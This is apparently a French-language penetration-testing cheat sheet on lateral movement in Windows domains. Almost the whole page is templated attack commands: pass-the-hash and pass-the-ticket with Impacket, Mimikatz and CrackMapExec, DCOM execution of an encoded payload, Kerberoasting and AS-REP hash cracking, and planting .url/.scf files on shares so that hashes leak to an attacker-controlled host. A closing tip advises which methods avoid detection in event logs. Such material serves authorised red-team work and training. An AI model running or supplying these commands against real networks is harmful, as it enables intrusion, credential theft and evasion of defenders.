lateral-movementpthpass-the-hash
MDstable
Lateral Movement
Pass-the-Hash, Pass-the-Ticket, PsExec, WMI, WinRM — se déplacer dans un réseau compromis
snippetadvanced 2025-05-13 3 min read
lateral-movementpthpass-the-hashpsexecwmiwinrmimpacketpentest
Pass-the-Hash (PtH)
bash
Variables
{{TARGET_DOMAIN}}
{{USER}}
{{TARGET_IP}}
{{NTLM_HASH}}
{{TARGET}}
# Impacket — PsExec avec hash NTLMpsexecpy {{TARGET_DOMAIN}}{{USER}}{{TARGET_IP}} -hashes {{NTLM_HASH}}# Impacket — WMIExec (moins de traces)wmiexecpy {{TARGET_DOMAIN}}{{USER}}{{TARGET_IP}} -hashes {{NTLM_HASH}}# Impacket — SMBExecsmbexecpy {{TARGET_DOMAIN}}{{USER}}{{TARGET_IP}} -hashes {{NTLM_HASH}}# Impacket — ATExec (via Task Scheduler)atexecpy {{TARGET_DOMAIN}}{{USER}}{{TARGET_IP}} -hashes {{NTLM_HASH}} "whoami"# CrackMapExec — scan PtH en massecrackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}}crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} -x "whoami"crackmapexec smb {{TARGET}}/24 -u {{USER}} -H {{NTLM_HASH}} --sam# xfreerdp — RDP avec hash (Restricted Admin Mode requis)xfreerdp /v{{TARGET_IP}} /u{{USER}} /pth{{NTLM_HASH}}
Pass-the-Ticket (PtT)
bash
Variables
{{USER}}
{{TARGET_DOMAIN}}
{{TARGET}}
{{NTLM_HASH}}
# Exporter les tickets depuis la mémoire (Mimikatz)mimikatz# sekurlsa::tickets /export # crée des fichiers .kirbi# Importer un ticketmimikatz# kerberos::ptt [0;12bd0]-0-0-40810000-{{USER}}@cifs-target.kirbimimikatz# kerberos::ptt ticket.kirbi# Vérifier les tickets en mémoiremimikatz# kerberos::listklist # commande native Windows# Depuis Linux — convertir et utiliserticketConverterpy ticketkirbi ticketccacheexport KRB5CCNAMEticketccachepsexecpy -k -no-pass {{TARGET_DOMAIN}}{{USER}}{{TARGET}}# Overpass-the-Hash (NTLM → Ticket Kerberos)mimikatz# sekurlsa::pth /user:{{USER}} /ntlm:{{NTLM_HASH}} /domain:{{TARGET_DOMAIN}} /run:powershell.exe# Puis dans le nouveau processus :klist # vérifier les tickets générés
PsExec et variantes
bash
Variables
{{TARGET_DOMAIN}}
{{USER}}
{{PASSWORD}}
{{TARGET_IP}}
# Impacket PsExec (crée un service — bruyant, détecté par EDR)psexecpy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}}{{TARGET_IP}}# Sysinternals PsExec (natif)PsExecexe {{TARGET_IP}} -u {{TARGET_DOMAIN}}{{USER}} -p {{PASSWORD}} cmdexe# SmbExec (pas de binaire déposé sur disque)smbexecpy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}}{{TARGET_IP}}
WMI
bash
Variables
{{TARGET_DOMAIN}}
{{USER}}
{{PASSWORD}}
{{TARGET_IP}}
# Impacket WMIExec (semi-interactif, sans service créé)wmiexecpy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}}{{TARGET_IP}}wmiexecpy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}}{{TARGET_IP}} "ipconfig /all"# PowerShell — WMI localInvoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"# PowerShell — WMI distant$cred Get-CredentialInvoke-WmiMethod -ComputerName {{TARGET_IP}} -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\out.txt"wmi"\\{{TARGET_IP}}\root\cimv2:Win32_Process" | Invoke-WmiMethod -Name Create -ArgumentList "cmd.exe"
WinRM / PowerShell Remoting
bash
Variables
{{TARGET_IP}}
{{USER}}
{{PASSWORD}}
{{NTLM_HASH}}
# Depuis Linuxevil-winrm -i {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}}evil-winrm -i {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}}# Depuis WindowsEnter-PSSession -ComputerName {{TARGET_IP}} -Credential Get-Credential)Invoke-Command -ComputerName {{TARGET_IP}} -Credential Get-Credential) -ScriptBlock whoami; hostname# CrackMapExeccrackmapexec winrm {{TARGET_IP}} -u {{USER}} -p {{PASSWORD}} -x "whoami"crackmapexec winrm {{TARGET_IP}} -u {{USER}} -H {{NTLM_HASH}} -x "whoami"
DCOM
powershell
Variables
{{TARGET_IP}}
{{B64_PAYLOAD}}
# MMC20.Application (port 135)$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","{{TARGET_IP}}"))$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c powershell -e {{B64_PAYLOAD}}","7")# ShellWindows$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application","{{TARGET_IP}}"))$dcom.ShellExecute("cmd.exe","/c powershell -e {{B64_PAYLOAD}}","C:\Windows\System32","",0)
Kerberoasting
bash
Variables
{{TARGET_DOMAIN}}
{{USER}}
{{PASSWORD}}
{{TARGET_IP}}
# GetUserSPNs — depuis LinuxGetUserSPNspy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}} -dc-ip {{TARGET_IP}} -requestGetUserSPNspy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -outputfile kerberoasttxt# PowerView — depuis WindowsGet-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv kerberoastcsv -NoTypeInformationInvoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File kerberoasttxt# Crackhashcat -m 13100 kerberoasttxt /usr/share/wordlists/rockyou.txt -r rules/best64.rule
ASREPRoasting
bash
Variables
{{TARGET_DOMAIN}}
{{TARGET_IP}}
{{USER}}
{{PASSWORD}}
# GetNPUsers — comptes sans pré-auth Kerberos requiseGetNPUserspy {{TARGET_DOMAIN}} -dc-ip {{TARGET_IP}} -usersfile userstxt -format hashcatGetNPUserspy {{TARGET_DOMAIN}}{{USER}}{{PASSWORD}} -dc-ip {{TARGET_IP}} -request -format hashcat# PowerViewGet-DomainUser -PreauthNotRequired | Get-ASREPHash -Format Hashcat | Out-File asreptxt# Crack AS-REP hash (mode 18200)hashcat -m 18200 asreptxt /usr/share/wordlists/rockyou.txt
Mouvement latéral via partages
bash
Variables
{{TARGET}}
{{USER}}
{{PASSWORD}}
{{LHOST}}
{{INTERFACE}}
# Trouver les partages avec accès en écriturecrackmapexec smb {{TARGET}}/24 -u {{USER}} -p {{PASSWORD}} --shares# Déposer un fichier pour vol de hash (Responder)# Créer un fichier @malicious.url ou desktop.ini dans un partage partagéecho InternetShortcutURLfile//{{LHOST}}/x > captureurl# SCF file (dans un partage)echo ShellCommand2IconFile{{LHOST}}shareiconico > lootscf# Intercepter avec Responderresponder -I {{INTERFACE}} -wrf
💡 Tip —
WMIExec et ATExec sont plus discrets que PsExec car ils ne créent pas de service Windows (Event ID 7045). Evil-WinRM laisse des traces dans les logs PowerShell Remoting (Event ID 4103/4104). Le mouvement le plus furtif reste PtT avec un ticket valide — aucun nouveau processus créé.
OPS·BRAIN v1.075 notes · Securitylocal